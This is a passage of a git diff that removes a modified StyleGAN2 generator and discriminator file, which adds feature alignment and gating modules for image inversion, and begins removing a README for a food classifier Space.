extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, activation={self.activation:s},', - f'up={self.up}, down={self.down}']) - -#---------------------------------------------------------------------------- - - -class 
MappingNetwork(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality, 0 = no latent. - c_dim, # Conditioning label (C) dimensionality, 0 = no label. - w_dim, # Intermediate latent (W) dimensionality. - num_ws, # Number of intermediate latents to output, None = do not broadcast. - num_layers = 8, # Number of mapping layers. - embed_features = None, # Label embedding dimensionality, None = same as w_dim. - layer_features = None, # Number of intermediate features in the mapping layers, None = same as w_dim. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - lr_multiplier = 0.01, # Learning rate multiplier for the mapping layers. - w_avg_beta = 0.998, # Decay for tracking the moving average of W during training, None = do not track. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - if embed_features is None: - embed_features = w_dim - if c_dim == 0: - embed_features = 0 - if layer_features is None: - layer_features = w_dim - features_list = [z_dim + embed_features] + [layer_features] * (num_layers - 1) + [w_dim] - - if c_dim > 0: - self.embed = FullyConnectedLayer(c_dim, embed_features) - for idx in range(num_layers): - in_features = features_list[idx] - out_features = features_list[idx + 1] - layer = FullyConnectedLayer(in_features, out_features, activation=activation, lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - - if num_ws is not None and w_avg_beta is not None: - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, repeat_w = False): - # Embed, normalize, and concat inputs. - x = None - with torch.autograd.profiler.record_function('input'): - if self.z_dim > 0: - misc.assert_shape(z, [None, self.z_dim]) - x = normalize_2nd_moment(z.to(torch.float32)) - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = normalize_2nd_moment(self.embed(c.to(torch.float32))) - x = torch.cat([x, y], dim=1) if x is not None else y - - # Main layers. - for idx in range(self.num_layers): - layer = getattr(self, f'fc{idx}') - x = layer(x) - - # Update moving average of W. - if update_emas and self.w_avg_beta is not None: - with torch.autograd.profiler.record_function('update_w_avg'): - self.w_avg.copy_(x.detach().mean(dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast. - #if self.num_ws is not None: - if repeat_w: - with torch.autograd.profiler.record_function('broadcast'): - x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - - # Apply truncation. - if truncation_psi != 1: - with torch.autograd.profiler.record_function('truncate'): - assert self.w_avg_beta is not None - if self.num_ws is None or truncation_cutoff is None: - x = self.w_avg.lerp(x, truncation_psi) - else: - x[:, :truncation_cutoff] = self.w_avg.lerp(x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -#---------------------------------------------------------------------------- - - -class SynthesisLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Resolution of this layer. - kernel_size = 3, # Convolution kernel size. - up = 1, # Integer upsampling factor. 
- use_noise = True, # Enable noise input? - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - channels_last = False, # Use channels_last format for the weights? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.resolution = resolution - self.up = up - self.use_noise = use_noise - self.activation = activation - self.conv_clamp = conv_clamp - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.act_gain = bias_act.activation_funcs[activation].def_gain - - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - if use_noise: - self.register_buffer('noise_const', torch.randn([resolution, resolution])) - self.noise_strength = torch.nn.Parameter(torch.zeros([])) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - - def forward(self, x, w, noise_mode='random', n = None, weight_deltas = None,fused_modconv=True, gain=1): - assert noise_mode in ['random', 'const', 'none'] - in_resolution = self.resolution // self.up - misc.assert_shape(x, [None, self.in_channels, in_resolution, in_resolution]) - styles = self.affine(w) - - noise = None - if self.use_noise and noise_mode == 'random': - noise = torch.randn([x.shape[0], 1, self.resolution, self.resolution], device=x.device) * self.noise_strength - if self.use_noise and noise_mode == 'const': - if n is not None: - noise = n * self.noise_strength - else: - noise = self.noise_const * self.noise_strength - - flip_weight = (self.up == 1) # slightly faster - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, noise=noise, up=self.up, - padding=self.padding, resample_filter=self.resample_filter, flip_weight=flip_weight, fused_modconv=fused_modconv, weigth_deltas=weight_deltas) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, self.bias.to(x.dtype), act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d},', - f'resolution={self.resolution:d}, up={self.up}, activation={self.activation:s}']) - -#---------------------------------------------------------------------------- - - -class ToRGBLayer(torch.nn.Module): - def __init__(self, in_channels, out_channels, w_dim, kernel_size=1, conv_clamp=None, channels_last=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.conv_clamp = conv_clamp - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - - def forward(self, x, w, fused_modconv=True): - styles = self.affine(w) * 
self.weight_gain - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, demodulate=False, fused_modconv=fused_modconv) - x = bias_act.bias_act(x, self.bias.to(x.dtype), clamp=self.conv_clamp) - return x - - def extra_repr(self): - return f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d}' - -#---------------------------------------------------------------------------- -class ResLayers(nn.Module): - def __init__(self, in_channels, out_channels, stride=1): - super().__init__() - - if (in_channels == out_channels) and stride==1: - self.shortcut_layer = nn.Identity() - else: - self.shortcut_layer = nn.Sequential( - nn.Conv2d(in_channels, out_channels, (1, 1), stride, bias=False)) - - self.res_layer = nn.Sequential( - nn.Conv2d(in_channels, out_channels, (3, 3), (1, 1), 1, bias=True), nn.LeakyReLU(0.2), - nn.Conv2d(out_channels, out_channels, (3, 3), stride, 1, bias=True) ) - - def forward(self, x): - shortcut = self.shortcut_layer(x) - res = self.res_layer(x) - return res + shortcut - -class FeatureEdit(nn.Module): - def __init__(self, in_channels, out_channels): - super().__init__() - self.convs = nn.ModuleList() - iter_num = in_channels // out_channels - i_c = in_channels - for i in range(iter_num-1): - out_c = i_c - out_channels - self.convs.append( ResLayers(i_c,out_c,1) ) - i_c = out_c - def forward(self, diff): - for block in self.convs: - diff = block(diff) - return diff - -class FeatureAlignment(nn.Module): - def __init__(self, in_channels, out_channels): - super().__init__() - t_channel = 512 - self.first_layer = nn.Conv2d(in_channels, t_channel, kernel_size=1, padding=0, bias=True) - - self.conv1 = nn.Sequential(*[ResLayers(t_channel,t_channel,1)]) - self.conv2 = nn.Sequential(*[ResLayers(t_channel,t_channel,2), ResLayers(t_channel,t_channel,1)]) - self.conv3 = nn.Sequential(*[ResLayers(t_channel,t_channel,2), ResLayers(t_channel,t_channel,1)]) - - self.dconv1 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - self.dconv2 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - self.dconv3 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - - self.out_layer = nn.Conv2d(t_channel, out_channels, kernel_size=1, padding=0, bias=True) - - def forward(self, encoder_feats, generator_feats): - - x = torch.cat((encoder_feats,generator_feats), dim=1) - x = self.first_layer(x) - - f1 = self.conv1(x) - f2 = self.conv2(f1) - f3 = self.conv3(f2) - shape = f3.shape[-1] - df1 = F.interpolate(f3, size=(shape*2,shape*2) , mode='bilinear', align_corners=True) - df2 = self.dconv1(df1 + f2) - df2 = F.interpolate(df2, size=(shape*4,shape*4) , mode='bilinear', align_corners=True) - df3 = self.dconv2(df2 + f1) - - aligned_feats = self.out_layer(df3) - - return aligned_feats - -class FeatureExtraction(nn.Module): - def __init__(self,in_channels, out_channels ): - super().__init__() - t_channel = 512 - self.first_layer = nn.Conv2d(in_channels, t_channel, kernel_size=1, padding=0, bias=True) - self.convs = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,out_channels,1), ResLayers(out_channels,out_channels,1) ]) - #self.out_layer = nn.Conv2d(t_channel, out_channels, kernel_size=1, padding=0, bias=False) - - def forward(self, aligned_feats): - #x = aligned_feats - generator_feats - y = self.first_layer(aligned_feats) - y = self.convs(y) - #deltaF = self.out_layer(x) - return y - -class GateNetwork(nn.Module): - def __init__(self, 
in_channels, out_channels): - super().__init__() - t_channel = 256 - self.down1 = nn.Conv2d(in_channels, t_channel, kernel_size=3, padding=1, bias=True) - self.down2 = nn.Conv2d(in_channels, t_channel, kernel_size=3, padding=1, bias=True) - self.sigmoid = nn.Sigmoid() - self.convs = nn.Sequential(*[ResLayers(in_channels,in_channels,1), ResLayers(in_channels,out_channels,1), ResLayers(out_channels,out_channels,1) ]) - self.convs2 = nn.Sequential(*[ResLayers(in_channels,in_channels,1), ResLayers(in_channels,out_channels,1), ResLayers(out_channels,1,1) ]) - - - def forward(self, generator_feats, y): - generator_feats = self.down1(generator_feats) - y = self.down2(y) - x = torch.cat((generator_feats, y), dim=1) - deltaF = self.convs(x) - gate = self.convs2(x) - gate = self.sigmoid(gate) - return deltaF, gate - -g_e_concat_shape={64: 640, 32:768} -e_shape = {64: 128, 32:256} - -class SynthesisBlock(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels, 0 = first block. - out_channels, # Number of output channels. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Resolution of this block. - img_channels, # Number of output color channels. - is_last, # Is this the last block? - architecture = 'skip', # Architecture: 'orig', 'skip', 'resnet'. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = 256, # Clamp the output of convolution layers to +-X, None = disable clamping. - use_fp16 = False, # Use FP16 for this block? - fp16_channels_last = False, # Use channels-last memory format with FP16? - fused_modconv_default = True, # Default value of fused_modconv. 'inference_only' = True for inference, False for training. - embed_res = 64, # Which resolution we embed the images - **layer_kwargs, # Arguments for SynthesisLayer. 
- ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.is_last = is_last - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.fused_modconv_default = fused_modconv_default - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.num_conv = 0 - self.num_torgb = 0 - - if in_channels == 0: - self.const = torch.nn.Parameter(torch.randn([out_channels, resolution, resolution])) - - if in_channels != 0: - self.conv0 = SynthesisLayer(in_channels, out_channels, w_dim=w_dim, resolution=resolution, up=2, - resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - self.conv1 = SynthesisLayer(out_channels, out_channels, w_dim=w_dim, resolution=resolution, - conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - if is_last or architecture == 'skip': - self.torgb = ToRGBLayer(out_channels, img_channels, w_dim=w_dim, - conv_clamp=conv_clamp, channels_last=self.channels_last) - self.num_torgb += 1 - - if in_channels != 0 and architecture == 'resnet': - self.skip = Conv2dLayer(in_channels, out_channels, kernel_size=1, bias=False, up=2, - resample_filter=resample_filter, channels_last=self.channels_last) - if resolution == embed_res: - in_c = g_e_concat_shape.get(embed_res) - #self.modify_feature_edit = FeatureEdit(in_channels=512, out_channels=e_shape.get(embed_res)) - self.modify_feature_alignment = FeatureAlignment(in_channels=in_c, out_channels=512) - self.modify_feature_extraction = FeatureExtraction(in_channels=512, out_channels=512) - self.modify_feature_gates = GateNetwork(in_channels=512, out_channels=512) - self.embed_res = embed_res - - def forward(self, x, img, ws, conditions=None, noise=None, weight_deltas = None, highres_outs=None, return_f = False, - force_fp32=False, fused_modconv=None, update_emas=False, **layer_kwargs): - _ = update_emas # unused - misc.assert_shape(ws, [None, self.num_conv + self.num_torgb, self.w_dim]) - w_iter = iter(ws.unbind(dim=1)) - if ws.device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - if fused_modconv is None: - fused_modconv = self.fused_modconv_default - if fused_modconv == 'inference_only': - fused_modconv = (not self.training) - - # Input. - if self.in_channels == 0: - x = self.const.to(dtype=dtype, memory_format=memory_format) - x = x.unsqueeze(0).repeat([ws.shape[0], 1, 1, 1]) - else: - misc.assert_shape(x, [None, self.in_channels, self.resolution // 2, self.resolution // 2]) - x = x.to(dtype=dtype, memory_format=memory_format) - gouts = {} - # Main layers. 
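        # Additions on top of the stock StyleGAN2 block: after conv0, the HFGI condition maps are
        # applied at 64x64, the raw feature map is returned early when return_f is set at
        # embed_res, and encoder features from highres_outs are fused through the alignment /
        # extraction / gating modules, with the gates and residuals recorded in gouts.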
- if self.in_channels == 0: - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, n=noise[0], weight_deltas=weight_deltas[0], **layer_kwargs) - elif self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x, next(w_iter), fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, gain=np.sqrt(0.5), **layer_kwargs) - x = y.add_(x) - else: - x = self.conv0(x, next(w_iter), fused_modconv=fused_modconv, n=noise[0], weight_deltas=weight_deltas[0], **layer_kwargs) - #HFGI Generator Modification - if x.shape[-1] == 64 and conditions is not None: - x = x*(1+conditions[0]) + conditions[1] - if x.shape[-1] == self.embed_res and return_f: - return x, None, None - #HighResFeat Generator Modification - if x.shape[-1] == self.embed_res and highres_outs is not None: - #feature_edit = self.modify_feature_edit(x - highres_outs['inversion']) - #high_res = highres_outs[f'{self.embed_res}x{self.embed_res}'] + feature_edit - aligned_feats = self.modify_feature_alignment(highres_outs[f'{self.embed_res}x{self.embed_res}'], highres_outs['inversion']) - aligned_feats = self.modify_feature_extraction(aligned_feats) - #x = self.modify_feature_gates(x, deltaF) - deltaF, gate = self.modify_feature_gates(x, aligned_feats) - x = (x * (1-gate) ) + ( (x + deltaF) * gate ) - gouts['gates'] = gate - gouts['additions'] = deltaF - gouts['aligned_feats'] = aligned_feats - - #gouts['aligned_loss'] =F.mse_loss(aligned_feats, x, reduction='mean') - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv,n=noise[1], weight_deltas=weight_deltas[1], **layer_kwargs) - - # ToRGB. - if img is not None: - misc.assert_shape(img, [None, self.img_channels, self.resolution // 2, self.resolution // 2]) - img = upfirdn2d.upsample2d(img, self.resample_filter) - if self.is_last or self.architecture == 'skip': - y = self.torgb(x, next(w_iter), fused_modconv=fused_modconv) - y = y.to(dtype=torch.float32, memory_format=torch.contiguous_format) - img = img.add_(y) if img is not None else y - - assert x.dtype == dtype - assert img is None or img.dtype == torch.float32 - return x, img, gouts - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - channel_base = 32768, # Overall multiplier for the number of channels. - channel_max = 512, # Maximum number of channels in any layer. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. - **block_kwargs, # Arguments for SynthesisBlock. 
- ): - assert img_resolution >= 4 and img_resolution & (img_resolution - 1) == 0 - super().__init__() - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.num_fp16_res = num_fp16_res - self.block_resolutions = [2 ** i for i in range(2, self.img_resolution_log2 + 1)] - channels_dict = {res: min(channel_base // res, channel_max) for res in self.block_resolutions} - fp16_resolution = max(2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - self.num_ws = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res // 2] if res > 4 else 0 - out_channels = channels_dict[res] - use_fp16 = (res >= fp16_resolution) - is_last = (res == self.img_resolution) - block = SynthesisBlock(in_channels, out_channels, w_dim=w_dim, resolution=res, - img_channels=img_channels, is_last=is_last, use_fp16=use_fp16, **block_kwargs) - self.num_ws += block.num_conv - if is_last: - self.num_ws += block.num_torgb - setattr(self, f'b{res}', block) - - def forward(self, ws, conditions=None, noise=None, weight_deltas=None, highres_outs=None, return_f = False, **block_kwargs): - block_ws = [] - with torch.autograd.profiler.record_function('split_ws'): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32) - w_idx = 0 - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - block_ws.append(ws.narrow(1, w_idx, block.num_conv + block.num_torgb)) - w_idx += block.num_conv - - x = img = None - conv_idx = 0 - gouts = {} - for res, cur_ws in zip(self.block_resolutions, block_ws): - block = getattr(self, f'b{res}') - if noise is not None: - noise_input = noise[conv_idx: conv_idx + block.num_conv] - else: - noise_input = [None] * block.num_conv - if weight_deltas is not None: - delta_input = weight_deltas[conv_idx: conv_idx + block.num_conv] - else: - delta_input = [None] * block.num_conv - x, img, gouts_per_res = block(x, img, cur_ws, conditions, noise_input, delta_input, highres_outs, return_f, **block_kwargs) - if return_f and img is None: - return x, None - if gouts_per_res: - gouts.update(gouts_per_res) - - conv_idx += block.num_conv - return img, gouts - - def extra_repr(self): - return ' '.join([ - f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_fp16_res={self.num_fp16_res:d}']) - -#---------------------------------------------------------------------------- - - -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Output resolution. - img_channels, # Number of output color channels. - mapping_kwargs = {}, # Arguments for MappingNetwork. - **synthesis_kwargs, # Arguments for SynthesisNetwork. 
- ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.synthesis = SynthesisNetwork(w_dim=w_dim, img_resolution=resolution, img_channels=img_channels, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork(z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - - # self.freeze_non_trainable_layers() - - def forward(self, lat, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, mode='synthesis', return_f = False, **synthesis_kwargs): - # self.freeze_non_trainable_layers() - if mode == 'mapping': - ws = self.mapping(lat, c, truncation_psi=truncation_psi, truncation_cutoff=truncation_cutoff, update_emas=update_emas) - return ws - if mode == 'synthesis': - img = self.synthesis(lat, highres_outs = c, return_f=return_f, update_emas=False, **synthesis_kwargs) - return img - - # def freeze_non_trainable_layers(self): - # for param in self.mapping.parameters(): - # param.requires_grad = False - # for name, param in self.synthesis.named_parameters(): - # if 'modify' not in name: - # param.requires_grad = False - -#---------------------------------------------------------------------------- - - -class DiscriminatorBlock(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels, 0 = first block. - tmp_channels, # Number of intermediate channels. - out_channels, # Number of output channels. - resolution, # Resolution of this block. - img_channels, # Number of input color channels. - first_layer_idx, # Index of the first layer. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - use_fp16 = False, # Use FP16 for this block? - fp16_channels_last = False, # Use channels-last memory format with FP16? - freeze_layers = 0, # Freeze-D: Number of layers to freeze. 
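        # (Layers whose global index is below freeze_layers are created with trainable=False via
        #  trainable_gen() below, so their weights stay fixed during transfer learning.)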
- ): - assert in_channels in [0, tmp_channels] - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.resolution = resolution - self.img_channels = img_channels - self.first_layer_idx = first_layer_idx - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - - self.num_layers = 0 - def trainable_gen(): - while True: - layer_idx = self.first_layer_idx + self.num_layers - trainable = (layer_idx >= freeze_layers) - self.num_layers += 1 - yield trainable - trainable_iter = trainable_gen() - - if in_channels == 0 or architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, tmp_channels, kernel_size=1, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv0 = Conv2dLayer(tmp_channels, tmp_channels, kernel_size=3, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv1 = Conv2dLayer(tmp_channels, out_channels, kernel_size=3, activation=activation, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last) - - if architecture == 'resnet': - self.skip = Conv2dLayer(tmp_channels, out_channels, kernel_size=1, bias=False, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, force_fp32=False): - if (x if x is not None else img).device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - - # Input. - if x is not None: - misc.assert_shape(x, [None, self.in_channels, self.resolution, self.resolution]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # FromRGB. - if self.in_channels == 0 or self.architecture == 'skip': - misc.assert_shape(img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - y = self.fromrgb(img) - x = x + y if x is not None else y - img = upfirdn2d.downsample2d(img, self.resample_filter) if self.architecture == 'skip' else None - - # Main layers. - if self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x) - x = self.conv1(x, gain=np.sqrt(0.5)) - x = y.add_(x) - else: - x = self.conv0(x) - x = self.conv1(x) - - assert x.dtype == dtype - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class MinibatchStdLayer(torch.nn.Module): - def __init__(self, group_size, num_channels=1): - super().__init__() - self.group_size = group_size - self.num_channels = num_channels - - def forward(self, x): - N, C, H, W = x.shape - with misc.suppress_tracer_warnings(): # as_tensor results are registered as constants - G = torch.min(torch.as_tensor(self.group_size), torch.as_tensor(N)) if self.group_size is not None else N - F = self.num_channels - c = C // F - - y = x.reshape(G, -1, F, c, H, W) # [GnFcHW] Split minibatch N into n groups of size G, and channels C into F groups of size c. - y = y - y.mean(dim=0) # [GnFcHW] Subtract mean over group. 
- y = y.square().mean(dim=0) # [nFcHW] Calc variance over group. - y = (y + 1e-8).sqrt() # [nFcHW] Calc stddev over group. - y = y.mean(dim=[2,3,4]) # [nF] Take average over channels and pixels. - y = y.reshape(-1, F, 1, 1) # [nF11] Add missing dimensions. - y = y.repeat(G, 1, H, W) # [NFHW] Replicate over group and pixels. - x = torch.cat([x, y], dim=1) # [NCHW] Append to input as new channels. - return x - - def extra_repr(self): - return f'group_size={self.group_size}, num_channels={self.num_channels:d}' - -#---------------------------------------------------------------------------- - - -class DiscriminatorEpilogue(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - cmap_dim, # Dimensionality of mapped conditioning label, 0 = no label. - resolution, # Resolution of this block. - img_channels, # Number of input color channels. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, None = entire minibatch. - mbstd_num_channels = 1, # Number of features for the minibatch standard deviation layer, 0 = disable. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.cmap_dim = cmap_dim - self.resolution = resolution - self.img_channels = img_channels - self.architecture = architecture - - if architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, in_channels, kernel_size=1, activation=activation) - self.mbstd = MinibatchStdLayer(group_size=mbstd_group_size, num_channels=mbstd_num_channels) if mbstd_num_channels > 0 else None - self.conv = Conv2dLayer(in_channels + mbstd_num_channels, in_channels, kernel_size=3, activation=activation, conv_clamp=conv_clamp) - self.fc = FullyConnectedLayer(in_channels * (resolution ** 2), in_channels, activation=activation) - self.out = FullyConnectedLayer(in_channels, 1 if cmap_dim == 0 else cmap_dim) - - def forward(self, x, img, cmap, force_fp32=False): - misc.assert_shape(x, [None, self.in_channels, self.resolution, self.resolution]) # [NCHW] - _ = force_fp32 # unused - dtype = torch.float32 - memory_format = torch.contiguous_format - - # FromRGB. - x = x.to(dtype=dtype, memory_format=memory_format) - if self.architecture == 'skip': - misc.assert_shape(img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - x = x + self.fromrgb(img) - - # Main layers. - if self.mbstd is not None: - x = self.mbstd(x) - x = self.conv(x) - x = self.fc(x.flatten(1)) - x = self.out(x) - - # Conditioning. - if self.cmap_dim > 0: - misc.assert_shape(cmap, [None, self.cmap_dim]) - x = (x * cmap).sum(dim=1, keepdim=True) * (1 / np.sqrt(self.cmap_dim)) - - assert x.dtype == dtype - return x - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class Discriminator(torch.nn.Module): - def __init__(self, - c_dim, # Conditioning label (C) dimensionality. - img_resolution, # Input resolution. - img_channels, # Number of input color channels. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - channel_base = 32768, # Overall multiplier for the number of channels. 
- channel_max = 512, # Maximum number of channels in any layer. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. - conv_clamp = 256, # Clamp the output of convolution layers to +-X, None = disable clamping. - cmap_dim = None, # Dimensionality of mapped conditioning label, None = default. - block_kwargs = {}, # Arguments for DiscriminatorBlock. - mapping_kwargs = {}, # Arguments for MappingNetwork. - epilogue_kwargs = {}, # Arguments for DiscriminatorEpilogue. - ): - super().__init__() - self.c_dim = c_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.block_resolutions = [2 ** i for i in range(self.img_resolution_log2, 2, -1)] - channels_dict = {res: min(channel_base // res, channel_max) for res in self.block_resolutions + [4]} - fp16_resolution = max(2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - if cmap_dim is None: - cmap_dim = channels_dict[4] - if c_dim == 0: - cmap_dim = 0 - - common_kwargs = dict(img_channels=img_channels, architecture=architecture, conv_clamp=conv_clamp) - cur_layer_idx = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res] if res < img_resolution else 0 - tmp_channels = channels_dict[res] - out_channels = channels_dict[res // 2] - use_fp16 = (res >= fp16_resolution) - block = DiscriminatorBlock(in_channels, tmp_channels, out_channels, resolution=res, - first_layer_idx=cur_layer_idx, use_fp16=use_fp16, **block_kwargs, **common_kwargs) - setattr(self, f'b{res}', block) - cur_layer_idx += block.num_layers - if c_dim > 0: - self.mapping = MappingNetwork(z_dim=0, c_dim=c_dim, w_dim=cmap_dim, num_ws=None, w_avg_beta=None, **mapping_kwargs) - self.b4 = DiscriminatorEpilogue(channels_dict[4], cmap_dim=cmap_dim, resolution=4, **epilogue_kwargs, **common_kwargs) - - def forward(self, img, c, update_emas=False, **block_kwargs): - _ = update_emas # unused - x = None - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - x, img = block(x, img, **block_kwargs) - - cmap = None - if self.c_dim > 0: - cmap = self.mapping(None, c) - x = self.b4(x, img, cmap) - return x - - def extra_repr(self): - return f'c_dim={self.c_dim:d}, img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d}' - -#---------------------------------------------------------------------------- diff --git a/spaces/hangjoni/food_classifier/README.md b/spaces/hangjoni/food_classifier/README.md deleted file mode 100644 index bfa8d6d0428de04ee05fb1a51d5ee9d4cba4ab97..0000000000000000000000000000000000000000 --- a/spaces/hangjoni/food_classifier/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Food Classifier -emoji: 📈 -colorFrom: green -colorTo: yellow -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -pinned: false -license: 